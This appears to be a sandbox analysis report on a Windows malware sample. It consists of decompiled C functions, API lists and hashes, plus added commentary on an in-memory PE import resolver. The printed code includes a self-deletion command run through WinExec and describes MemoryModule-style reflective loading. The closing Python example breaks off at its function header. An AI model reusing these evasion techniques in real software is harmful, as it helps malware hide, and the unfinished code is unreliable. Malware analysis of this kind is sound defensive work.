                                                                                                                                                0x1001b8c2
                                                                                                                                                0x1001b8d0
                                                                                                                                                0x1001b8d5
                                                                                                                                                0x1001b8da
                                                                                                                                                0x1001b8fd
                                                                                                                                                0x1001b90f
                                                                                                                                                0x1001b91d
                                                                                                                                                0x1001b923
                                                                                                                                                0x1001b92d
                                                                                                                                                0x1001b940
                                                                                                                                                0x1001b945
                                                                                                                                                0x1001b94a
                                                                                                                                                0x1001b95c
                                                                                                                                                0x1001b95f
                                                                                                                                                0x1001b962
                                                                                                                                                0x1001b97f
                                                                                                                                                0x1001b964
                                                                                                                                                0x1001b96c
                                                                                                                                                0x1001b971
                                                                                                                                                0x1001b977
                                                                                                                                                0x1001b977
                                                                                                                                                0x1001b98a
                                                                                                                                                0x1001b98f
                                                                                                                                                0x1001b994
                                                                                                                                                0x1001b99f
                                                                                                                                                0x1001b9a4
                                                                                                                                                0x1001b9a9
                                                                                                                                                0x1001b9b4
                                                                                                                                                0x1001b9b9
                                                                                                                                                0x1001b9be
                                                                                                                                                0x1001b9cb
                                                                                                                                                0x1001ba27
                                                                                                                                                0x1001ba2e
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ba2e
                                                                                                                                                0x1001b9d4
                                                                                                                                                0x1001ba1f
                                                                                                                                                0x1001ba22
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ba22
                                                                                                                                                0x1001b9e1
                                                                                                                                                0x1001b9ef
                                                                                                                                                0x1001b9f6
                                                                                                                                                0x1001ba08
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ba08
                                                                                                                                                0x1001b9fd
                                                                                                                                                0x1001ba33
                                                                                                                                                0x1001ba37
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ba3f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b9c0
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b9ab
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b996
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b94c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b8dc
                                                                                                                                                0x1001b84f
                                                                                                                                                0x1001b857
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b85d
                                                                                                                                                0x1001b808
                                                                                                                                                0x1001b80b
                                                                                                                                                0x1001b80e
                                                                                                                                                0x1001b815
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b819
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b81f
                                                                                                                                                0x1001b7c5
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b7cb
                                                                                                                                                0x1001b70a
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b710
                                                                                                                                                0x1001b6ed
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b6f3
                                                                                                                                                0x1001b6cc
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b6d2
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b6a9
                                                                                                                                                0x1001b67f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b685
                                                                                                                                                0x00000000

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B63E
• GetProcAddress.KERNEL32(00000000), ref: 1001B645
  • Part of subcall function 1001AE40: SetLastError.KERNEL32(0000000D,?,1001B659,100207E4,00000040), ref: 1001AE4D
• SetLastError.KERNEL32(000000C1), ref: 1001B67F
Strings
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ErrorLast$AddressHandleModuleProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 1762409328-192647395
• Opcode ID: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
• Instruction ID: 948ec142860bc01625bc2ce9e1704a97d6b06a0078abf06e4df2749841334317
• Opcode Fuzzy Hash: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
• Instruction Fuzzy Hash: CAE1E5B4E00609DFDB04CF94C885AAEBBB5FF88304F648558E905AF395D774E982CB91
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
E1000E90E() {
	int _t13;
	long _t19;
	signed int _t20;
	signed int _t21;
	signed int _t22;
	signed int _t23;
	signed int _t27;
	signed int _t28;
	signed int _t32;
	signed int _t33;
	void* _t37;
	long _t39;
	void* _t40;
	signed int _t47;
	struct _OSVERSIONINFOA* _t49;
	void* _t51;

	/* Allocate a 0x94-byte OSVERSIONINFOA on the process heap and query the OS version. */
	_t37 = GetProcessHeap;
	_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
	if(_t49 != 0) {
		_t49->dwOSVersionInfoSize = 0x94;
		_t13 = GetVersionExA(_t49);
		__eflags = _t13;
		_push(_t49);
		_push(0);
		if(_t13 != 0) {
			/* Copy the version fields into stack locals before the struct is freed. */
			*(_t51 + 0xc) = _t49->dwPlatformId;
			*(_t51 + 0x10) = _t49->dwMajorVersion;
			*(_t51 - 4) = _t49->dwMinorVersion;
			_t47 = _t49->dwBuildNumber & 0x00007fff;
			/* Arguments recovered from the two _push() calls above (the decompiler emitted them as ??). */
			HeapFree(GetProcessHeap(), 0, _t49);
			_t19 = *(_t51 + 0xc);
			__eflags = _t19 - 2;
			if(_t19 != 2) {
				/* dwPlatformId != VER_PLATFORM_WIN32_NT (2): flag the build number with the high bit. */
				_t47 = _t47 | 0x00008000;
				__eflags = _t47;
			}
			/* Publish the version data in module globals; this layout is consistent with the MSVC CRT startup
			   sequence (platform id, packed (major << 8) | minor, major, minor, build). */
			_t39 = *(_t51 - 4);
			*0x1033347c = _t19;
			_t20 = *(_t51 + 0x10);
			_t44 = (_t20 << 8) + _t39;
			*0x10333484 = (_t20 << 8) + _t39;
			*0x10333488 = _t20;
			*0x1033348c = _t39;
			*0x10333480 = _t47;
			_t21 = E1000F7BF(1);
			__eflags = _t21;
			_pop(_t40);
			if(_t21 == 0) {
				goto L1;
			} else {
				_t23 = E100133E0(_t37);
				__eflags = _t23;
				if(_t23 != 0) {
					E10015081();
					*0x10336f64 = GetCommandLineA();
					*0x103332fc = E10014F4C(); // executed
                                                                                                                                                								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
                                                                                                                                                								__eflags = _t27;
                                                                                                                                                								if(_t27 >= 0) {
                                                                                                                                                									_t28 = E10014E93(_t40);
                                                                                                                                                									__eflags = _t28;
                                                                                                                                                									if(_t28 < 0) {
                                                                                                                                                										L15:
                                                                                                                                                										E10014BD4();
                                                                                                                                                										goto L10;
                                                                                                                                                									} else {
                                                                                                                                                										_t32 = E10014C20(_t40, _t44);
                                                                                                                                                										__eflags = _t32;
                                                                                                                                                										if(_t32 < 0) {
                                                                                                                                                											goto L15;
                                                                                                                                                										} else {
                                                                                                                                                											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
                                                                                                                                                											__eflags = _t33;
                                                                                                                                                											if(_t33 != 0) {
                                                                                                                                                												goto L15;
                                                                                                                                                											} else {
                                                                                                                                                												 *0x103332f8 =  *0x103332f8 + 1;
                                                                                                                                                												_t22 = 1;
                                                                                                                                                												__eflags = 1;
                                                                                                                                                											}
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                								} else {
                                                                                                                                                									L10:
                                                                                                                                                									E100130CA();
                                                                                                                                                									goto L8;
                                                                                                                                                								}
                                                                                                                                                							} else {
                                                                                                                                                								L8:
                                                                                                                                                								E1000F819();
                                                                                                                                                								goto L1;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					} else {
                                                                                                                                                						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                						goto L1;
                                                                                                                                                					}
                                                                                                                                                				} else {
                                                                                                                                                					L1:
                                                                                                                                                					_t22 = 0;
                                                                                                                                                				}
                                                                                                                                                				return _t22;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2870529951-0
                                                                                                                                                • Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                • Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
                                                                                                                                                • Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                • Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001A260() {
                                                                                                                                                				char _v267;
                                                                                                                                                				char _v268;
                                                                                                                                                				char _v531;
                                                                                                                                                				char _v532;
                                                                                                                                                				int _t15;
                                                                                                                                                				void* _t20;
                                                                                                                                                
                                                                                                                                                				_v532 = 0;
                                                                                                                                                				E1000CF20(_t20,  &_v531, 0, 0x103);
                                                                                                                                                				_v268 = 0;
                                                                                                                                                				E1000CF20(_t20,  &_v267, 0, 0x103);
                                                                                                                                                				GetModuleFileNameA(0,  &_v532, 0x104);
                                                                                                                                                				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
                                                                                                                                                				_t15 = WinExec( &_v268, 0); // executed
                                                                                                                                                				return _t15;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                • API String ID: 2874319085-10483710
                                                                                                                                                • Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                • Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                				struct HINSTANCE__* _v8;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				char _v52;
                                                                                                                                                				char _v53;
                                                                                                                                                				short _v55;
                                                                                                                                                				char _v59;
                                                                                                                                                				char _v63;
                                                                                                                                                				char _v67;
                                                                                                                                                				char _v71;
                                                                                                                                                				char _v72;
                                                                                                                                                				char _v335;
                                                                                                                                                				char _v336;
                                                                                                                                                				signed int _v340;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                				void* _t45;
                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                
                                                                                                                                                				_t80 = __eflags;
                                                                                                                                                				_t71 = __edi;
                                                                                                                                                				_push(0xffffffff);
                                                                                                                                                				_push(E10022A9E);
                                                                                                                                                				_push( *[fs:0x0]);
                                                                                                                                                				 *[fs:0x0] = _t73;
                                                                                                                                                				_v340 = 0;
                                                                                                                                                				E10001160( &_v52, __eflags, 0x10024ca1);
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v336 = 0;
                                                                                                                                                				E1000CF20(__edi,  &_v335, 0, 0x103);
                                                                                                                                                				GetModuleFileNameA(0,  &_v336, 0x104);
                                                                                                                                                				_t40 = E1001A170( &_v336); // executed
                                                                                                                                                				_v24 = _t40;
                                                                                                                                                				_v72 = 0;
                                                                                                                                                				_v71 = 0;
                                                                                                                                                				_v67 = 0;
                                                                                                                                                				_v63 = 0;
                                                                                                                                                				_v59 = 0;
                                                                                                                                                				_v55 = 0;
                                                                                                                                                				_v53 = 0;
                                                                                                                                                				E1000CC93(_t71,  &_v72, "%d", _v24);
                                                                                                                                                				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
                                                                                                                                                				_t81 = _v20;
                                                                                                                                                				if(_v20 != 0) {
                                                                                                                                                					E10001A90( &_v52, _t81, _v20);
                                                                                                                                                					E10001A90( &_v52, _t81, ".exe");
                                                                                                                                                					_push(_v20);
                                                                                                                                                					E1000CA30(__ebx, _t71, __esi, _t81);
                                                                                                                                                				}
                                                                                                                                                				_t45 = E10001200( &_v52);
                                                                                                                                                				_t82 = _t45;
                                                                                                                                                				if(_t45 == 0) {
                                                                                                                                                					E10001A90( &_v52, _t82, "baidu.exe");
                                                                                                                                                				}
                                                                                                                                                				E10001110(_a4, _t82,  &_v52);
                                                                                                                                                				_v340 = _v340 | 0x00000001;
                                                                                                                                                				_v8 = 0xffffffff;
                                                                                                                                                				E100011A0( &_v52);
                                                                                                                                                				 *[fs:0x0] = _v16;
                                                                                                                                                				return _a4;
                                                                                                                                                			}


                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001A651
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                  • Part of subcall function 1001A170: FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                  • Part of subcall function 1001A170: FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                  • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID: .exe$baidu.exe
                                                                                                                                                • API String ID: 3164538923-2273953317
                                                                                                                                                • Opcode ID: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                • Opcode Fuzzy Hash: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 33%
                                                                                                                                                			E10019960(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				char _v44;
                                                                                                                                                				char _v48;
                                                                                                                                                				char _v312;
                                                                                                                                                				char _v572;
                                                                                                                                                				char _v832;
                                                                                                                                                				char _v1092;
                                                                                                                                                				char _v1352;
                                                                                                                                                				char _v1368;
                                                                                                                                                				char _v1372;
                                                                                                                                                				intOrPtr _v1376;
                                                                                                                                                				intOrPtr _v1380;
                                                                                                                                                				signed int _v1384;
	void* __edi;
	void* __esi;
	void* __ebp;
	intOrPtr _t74;
	intOrPtr _t80;
	void* _t85;
	void* _t88;
	void* _t91;
	void* _t94;
	void* _t97;
	void* _t116;
	signed int _t150;
	void* _t164;
	void* _t168;
	void* _t171;
	void* _t174;
	void* _t177;
	void* _t180;
	void* _t182;
	void* _t183;
	void* _t184;
	void* _t185;
	void* _t186;
	intOrPtr _t187;
	void* _t188;
	void* _t189;
	void* _t191;
	void* _t193;
	void* _t194;
	void* _t196;
	void* _t197;
	void* _t199;
	void* _t200;
	void* _t202;
	void* _t203;

	_t116 = __ebx;
	 *[fs:0x0] = _t187;
	_t188 = _t187 - 0x558;
	_v1384 = 0;
	_t74 = E10003170( &_v1368, __eflags);
	_v8 = 0;
	_v1376 = 0;
	_v48 = 0;
	_v1372 = 0;
	__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E10022A8C, 0xffffffff); // executed
	_v1380 = _t74;
	if(_v1380 != 0xffffffff) {
		E1000CF20(_t164,  &_v44, 0, 0x1c);
		_t189 = _t188 + 0xc;
		_v44 = 0x1c;
		while(1) {
			_t148 = _v1376;
			_t80 = _v1380;
			__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
			if(_t80 == 0) {
				break;
			}
			E1000CF20(_t164,  &_v1352, 0, 0x514);
			_push( &_v1372);
			_push( &_v48);
			_push(0);
			_t191 = _t189 + 0xc - 0x1c;
			_t182 =  &_v44;
			memcpy(_t191, _t182, 7 << 2);
			_t168 = _t182 + 0xe;
			_push(_v1380); // executed
			_t85 = E10019780(_t116, _t182); // executed
			_t193 = _t191 + 0x38;
			_t213 = _t85;
			if(_t85 != 0) {
				E1000D190(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
				_push(_v48);
				E1000CA30(_t116, _t168, _t182, _t213);
				_t193 = _t193 + 0x10;
			}
			_push( &_v1372);
			_push( &_v48);
			_push(7);
			_t194 = _t193 - 0x1c;
			_t183 =  &_v44;
			memcpy(_t194, _t183, 7 << 2);
			_t171 = _t183 + 0xe;
			_push(_v1380); // executed
			_t88 = E10019780(_t116, _t183); // executed
			_t196 = _t194 + 0x38;
			_t214 = _t88;
			if(_t88 != 0) {
				E1000D190(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
				_push(_v48);
				E1000CA30(_t116, _t171, _t183, _t214);
				_t196 = _t196 + 0x10;
			}
			_push( &_v1372);
			_push( &_v48);
			_push(0x16);
			_t197 = _t196 - 0x1c;
			_t184 =  &_v44;
			memcpy(_t197, _t184, 7 << 2);
			_t174 = _t184 + 0xe;
			_push(_v1380); // executed
			_t91 = E10019780(_t116, _t184); // executed
			_t199 = _t197 + 0x38;
			_t215 = _t91;
			if(_t91 != 0) {
				E1000D190(_t116, _t174, _t184,  &_v832, _v48, _v1372);
				_push(_v48);
				E1000CA30(_t116, _t174, _t184, _t215);
				_t199 = _t199 + 0x10;
			}
			_push( &_v1372);
			_push( &_v48);
			_push(0xc);
			_t200 = _t199 - 0x1c;
			_t185 =  &_v44;
			memcpy(_t200, _t185, 7 << 2);
			_t177 = _t185 + 0xe;
			_push(_v1380); // executed
			_t94 = E10019780(_t116, _t185); // executed
			_t202 = _t200 + 0x38;
			_t216 = _t94;
			if(_t94 != 0) {
				E1000D190(_t116, _t177, _t185,  &_v572, _v48, _v1372);
				_push(_v48);
				E1000CA30(_t116, _t177, _t185, _t216);
				_t202 = _t202 + 0x10;
			}
			_push( &_v1372);
			_push( &_v48);
			_push(8);
			_t203 = _t202 - 0x1c;
			_t186 =  &_v44;
			memcpy(_t203, _t186, 7 << 2);
			_t164 = _t186 + 0xe;
			_push(_v1380); // executed
			_t97 = E10019780(_t116, _t186); // executed
			_t189 = _t203 + 0x38;
			_t217 = _t97;
			if(_t97 != 0) {
				E1000D190(_t116, _t164, _t186,  &_v312, _v48, _v1372);
				_push(_v48);
				E1000CA30(_t116, _t164, _t186, _t217);
				_t189 = _t189 + 0x10;
			}
			_v1376 = _v1376 + 1;
			E10003310( &_v1368,  &_v1352, _t217,  &_v1352);
		}
		__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
	}
	E100031A0(_a4, _t148, __eflags,  &_v1368);
	_t150 = _v1384 | 0x00000001;
	__eflags = _t150;
	_v1384 = _t150;
	_v8 = 0xffffffff;
	E10003280( &_v1368); // executed
	 *[fs:0x0] = _v16;
	return _a4;
}
                                                                                                                                                0x10019adc
                                                                                                                                                0x10019ae4
                                                                                                                                                0x10019ae9
                                                                                                                                                0x10019ae9
                                                                                                                                                0x10019af1
                                                                                                                                                0x10019af2
                                                                                                                                                0x10019af7
                                                                                                                                                0x10019afa
                                                                                                                                                0x10019afc
                                                                                                                                                0x10019b10
                                                                                                                                                0x10019b1b
                                                                                                                                                0x10019b1c
                                                                                                                                                0x10019b21
                                                                                                                                                0x10019b21
                                                                                                                                                0x10019b2a
                                                                                                                                                0x10019b2e
                                                                                                                                                0x10019b2f
                                                                                                                                                0x10019b31
                                                                                                                                                0x10019b39
                                                                                                                                                0x10019b3e
                                                                                                                                                0x10019b3e
                                                                                                                                                0x10019b46
                                                                                                                                                0x10019b47
                                                                                                                                                0x10019b4c
                                                                                                                                                0x10019b4f
                                                                                                                                                0x10019b51
                                                                                                                                                0x10019b65
                                                                                                                                                0x10019b70
                                                                                                                                                0x10019b71
                                                                                                                                                0x10019b76
                                                                                                                                                0x10019b76
                                                                                                                                                0x10019b7f
                                                                                                                                                0x10019b83
                                                                                                                                                0x10019b84
                                                                                                                                                0x10019b86
                                                                                                                                                0x10019b8e
                                                                                                                                                0x10019b93
                                                                                                                                                0x10019b93
                                                                                                                                                0x10019b9b
                                                                                                                                                0x10019b9c
                                                                                                                                                0x10019ba1
                                                                                                                                                0x10019ba4
                                                                                                                                                0x10019ba6
                                                                                                                                                0x10019bba
                                                                                                                                                0x10019bc5
                                                                                                                                                0x10019bc6
                                                                                                                                                0x10019bcb
                                                                                                                                                0x10019bcb
                                                                                                                                                0x10019bd7
                                                                                                                                                0x10019bea
                                                                                                                                                0x10019bea
                                                                                                                                                0x10019bfb
                                                                                                                                                0x10019bfb
                                                                                                                                                0x10019c0b
                                                                                                                                                0x10019c16
                                                                                                                                                0x10019c16
                                                                                                                                                0x10019c19
                                                                                                                                                0x10019c1f
                                                                                                                                                0x10019c2c
                                                                                                                                                0x10019c37
                                                                                                                                                0x10019c43

                                                                                                                                                APIs
                                                                                                                                                • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 100199BF
                                                                                                                                                • _memset.LIBCMT ref: 100199E0
                                                                                                                                                • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A01
                                                                                                                                                • _memset.LIBCMT ref: 10019A1D
                                                                                                                                                  • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                  • Part of subcall function 10019780: GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                  • Part of subcall function 10019780: _memset.LIBCMT ref: 100197DE
                                                                                                                                                  • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019BFB
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3323326763-0
                                                                                                                                                • Opcode ID: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                • Instruction ID: 92146aaf36cf8da670849d236f9b8fe300c912f778ed1f5ba4bfc820bf5b102a
                                                                                                                                                • Opcode Fuzzy Hash: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                • Instruction Fuzzy Hash: 7381B676D006089BDB14DBA4DC51FEFB379EB48311F048198F509B7281EB35AA85CFA1
Uniqueness
• Uniqueness Score: -1.00%

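The routine E1001AB60 decompiled below is an import resolver for a PE image that the sample has mapped into memory itself, which is the mechanism behind the "Detected unpacking (creates a PE file in dynamic memory)" signature. Reading the offsets: `*_a4` is the IMAGE_NT_HEADERS pointer and `*_a4 + 0x80` is DataDirectory[IMPORT] (its Size at +4); `_v20` is the mapped base; `_v8` walks IMAGE_IMPORT_DESCRIPTOR entries of 0x14 bytes (the IsBadReadPtr size) until one whose Name field (+0xC) is zero; the function pointer at `_a4 + 0x24` plays LoadLibrary and the one at `_a4 + 0x28` plays GetProcAddress, each also receiving the user value at `_a4 + 0x34`; each handle is appended to an array at `_a4 + 8` that is reallocated by `E1000E018` to `(count + 1) * 4` bytes, with the count at `_a4 + 0xc`; OriginalFirstThunk (+0) is the lookup table unless it is zero, in which case FirstThunk (+0x10) serves as both; thunk entries with bit 0x80000000 set are ordinal imports, the rest point at IMAGE_IMPORT_BY_NAME, whose name starts 2 bytes in. These field offsets match the BuildImportTable step of the open-source MemoryModule loader exactly; that is an inference from the offsets, the report itself does not name the loader. The Python below is an added example, not code from the sample or from the report: it walks a constructed minimal in-memory image with the same control flow and patches the FirstThunk slots through stand-in loader callbacks. The DLL table, the image layout and all addresses are constructed; the handling of the ordinal branch and of a failed LoadLibrary is assumed from the standard PE layout and from MemoryModule, because the listing is cut off before those paths.

```python
import struct

# Layout constants for a 32-bit PE, matching the offsets used by E1001AB60
IMPORT_DIR_OFF   = 0x80        # &IMAGE_NT_HEADERS32.OptionalHeader.DataDirectory[IMPORT]
IMPORT_DESC_SIZE = 0x14        # sizeof(IMAGE_IMPORT_DESCRIPTOR), the IsBadReadPtr size
ORDINAL_FLAG32   = 0x80000000  # IMAGE_ORDINAL_FLAG32 in a thunk entry


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def cstr(buf, off):
    return bytes(buf[off:buf.index(b"\0", off)]).decode("ascii")


def resolve_imports(image, nt_off, load_library, get_proc_address):
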